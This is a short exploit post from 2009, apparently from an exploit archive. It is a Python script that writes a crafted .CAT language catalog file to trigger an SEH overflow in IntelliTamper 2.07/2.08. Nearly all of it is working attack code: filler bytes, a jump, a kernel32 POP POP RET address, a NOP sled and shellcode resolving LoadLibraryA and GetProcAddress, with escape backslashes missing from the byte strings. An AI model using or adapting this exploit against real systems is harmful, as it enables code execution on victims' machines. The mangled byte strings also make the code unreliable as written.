intellitamperlang-overflow.txt
Posted on 08 January 2009
#!usr/bin/python # IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit. # we start off the exploitation with some fuzzing to determine how many bytes # before overwriting the pointer to next SEH # and pointer to SEH, we will try and overwrite each address with 41414141 "AAAA" [Pointer to next SEH] # and 42424242 "BBBB" [pointer to SEH]. # 0x41414141 Pointer to next SEH record # 0x42424242 SE handler # # The vulnerability was discovered by 'Cnaph'. First click in "File" through your IntelliTamper and >> "Options" # Then open your crafted file .CAT to update your Language catalog and your SEH will be overwritten. # This exploit implements the SEH technique to exploit the issue . . . # When doing SEH overwrites the pointer to the SEH handler is target to be overwritten, # so we can gain control over the program. #/Cnaph. print "[+] IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit."; Variable = "x24x30x30x30x38x30x3D"; Junks =("x41"*761)+("x91"*19702)+(106*"x41") Nex_SEHHandler = "xebx06x90x90"; # JMP SEH_handler = "x61xfbx86x7c"; # SE.42424242 le SEH handler est ecrasé. # L'addresse de déplacement de l'indicateur SEH va etre changé. # KERNEL32.DLL (CALL EBX POP POP RET) NOP_SLED = "x90"*12 Shellcode =((("x31xc0x31xdbx31xc9x31xd2xebx37x59x88x51x0axbb" "x77x1dx80x7c" #LoadlibaryA(libaryname) "x51xffxd3xebx39x59x31xd2x88x51x0bx51x50xbb" "x28xacx80x7c" #GetProcAddress(hmodule,functionname) "xffxd3xebx39x59x31xd2x88x51x06x31xd2x52x51" "x51x52xffxd0x31xd2x50xb8xa2xcax81x7cxffxd0xe8xc4xff" "xffxffx75x73x65x72x33x32x2ex64x6cx6cx4exe8xc2xffxff" "xffx4dx65x73x73x61x67x65x42x6fx78x41x4exe8xc2xffxff" "xffx63x4Ex34x70x68x75x78"))); # Plus = " " Seh_overwrite = Variable + Junks + Nex_SEHHandler + SEH_handler + NOP_SLED + Shellcode genre = ".CAT"; Title = "IntelliTamper_DZ"; headers = open(Title + genre, "w") headers.write(Seh_overwrite) headers.close() print "[+] Exploit file has been successfully built."; print " Cnaph.";
